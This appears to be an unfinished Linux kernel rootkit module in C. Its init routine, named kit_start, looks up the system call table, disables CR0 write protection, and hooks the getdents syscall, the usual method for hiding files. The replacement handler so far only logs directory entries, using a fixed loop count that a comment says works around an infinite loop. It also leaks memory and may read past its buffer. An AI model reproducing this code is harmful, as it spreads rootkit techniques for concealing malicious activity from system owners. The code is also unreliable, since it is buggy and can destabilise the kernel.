#include <linux/init.h>#include <linux/module.h>#include <linux/syscalls.h

1.  
2. #include <linux/init.h>
3. #include <linux/module.h>
4. #include <linux/syscalls.h>
5. #include <linux/kallsyms.h>
6. #include <linux/slab.h>
7. #include <linux/kern_levels.h>
8. #include <linux/gfp.h>
9. #include <asm/unistd.h>
10. #include <asm/paravirt.h>
11. #include <linux/kernel.h>
12.  
13. MODULE_LICENSE("GPL");
14.  
15. struct linux_dirent {
16. unsigned long d_ino;
17. unsigned long d_off;
18. unsigned short d_reclen;
19. char d_name[];
20. };
21.  
22. #define GETDENTS_SYSCALL_NUM __NR_getdents
23.  
24.  
25.  
26. void **sc_table;
27.  
28.  
29. // function type for the getdents handler function
30. asmlinkage int ( *orig_getdents )(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count);
31.  
32. /*
33. * Following section is for memory protection enable/disable
34. */
35.  
36. inline void mywrite_cr0(unsigned long cr0) {
37. asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order));
38. }
39.  
40. void enable_write_protection(void) {
41. unsigned long cr0 = read_cr0();
42. set_bit(16, &cr0);
43. mywrite_cr0(cr0);
44. }
45.  
46. void disable_write_protection(void) {
47. unsigned long cr0 = read_cr0();
48. clear_bit(16, &cr0);
49. mywrite_cr0(cr0);
50. }
51.  
52. // our new getdents handler
53. asmlinkage int sys_getdents_new(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) {
54.  
55. struct linux_dirent *retn, *dirp3;
56. // unsigned long Records;
57. int Records, RemainingBytes;
58. unsigned short length;
59. Records = (*orig_getdents)(fd, dirent, count);
60. //printk(KERN_INFO "Inside sys_getdents_new : %d", Records);
61. //printk(KERN_INFO "dirent lenght : %hu", dirent->d_reclen);
62.  
63. if (Records <= 0){
64. printk(KERN_INFO "Record is 0 or less");
65. return Records;
66. }
67.  
68. // allocating retn (with the size of Record), in kernel memory
69. retn = (struct linux_dirent *) kmalloc(Records, GFP_KERNEL);
70.  
71.  
72. // coping the content of dirent --> (to) --> rent
73. copy_from_user(retn, dirent, Records);
74.  
75.  
76. printk(KERN_INFO "retn->d_reclen %hu", retn->d_reclen);
77. printk(KERN_INFO "retn->d_name %s", retn->d_name);
78.  
79.  
80. RemainingBytes = Records;
81. int i=100;
82. // As retn->d_reclen always yields 0, RemainingBytes remains the same causing infinite loop
83. // while(RemainingBytes > 0){
84. while(i > 0){
85.  
86. RemainingBytes -= retn->d_reclen;
87. printk(KERN_INFO "RemainingBytes %d \t File: %s " , RemainingBytes , retn->d_name );
88.  
89. retn = (struct linux_dirent *) ((char *)retn + retn->d_reclen);
90. printk(KERN_INFO "Next decrease from RemainingBytes %d " , retn->d_reclen);
91. i--;
92.  
93. }
94.  
95. // Copy the record back to the origional struct
96. //copy_to_user(dirent, retn, Records);
97. //kfree(retn);
98.  
99.  
100. return Records;
101. }
102.  
103.  
104.  
105. static int __init kit_start(void)
106. {
107. // get sys_call_address
108. sc_table = (void **)kallsyms_lookup_name("sys_call_table");
109. printk(KERN_INFO "System call table address: %p", sc_table);
110.  
111. // record the original getdents handler
112. orig_getdents = (void*)sc_table[GETDENTS_SYSCALL_NUM]; // __NR_getdents
113. printk(KERN_INFO "original sys_getdents %p", orig_getdents);
114. printk(KERN_INFO "original table getdents %p", sc_table[GETDENTS_SYSCALL_NUM]);
115.  
116. disable_write_protection();
117. // hooking our handler in place of sys_getdents
118. sc_table[GETDENTS_SYSCALL_NUM]=&sys_getdents_new;
119. enable_write_protection();
120.  
121.  
122. return 0;
123. }
124.  
125.  
126. /*delete module rmmod*/
127. void __exit kit_exit(void)
128. {
129. printk(KERN_INFO "Exiting");
130. disable_write_protection();
131. sc_table[GETDENTS_SYSCALL_NUM] = orig_getdents;
132. enable_write_protection();
133.  
134. }
135.  
136. module_init(kit_start);
137. module_exit(kit_exit);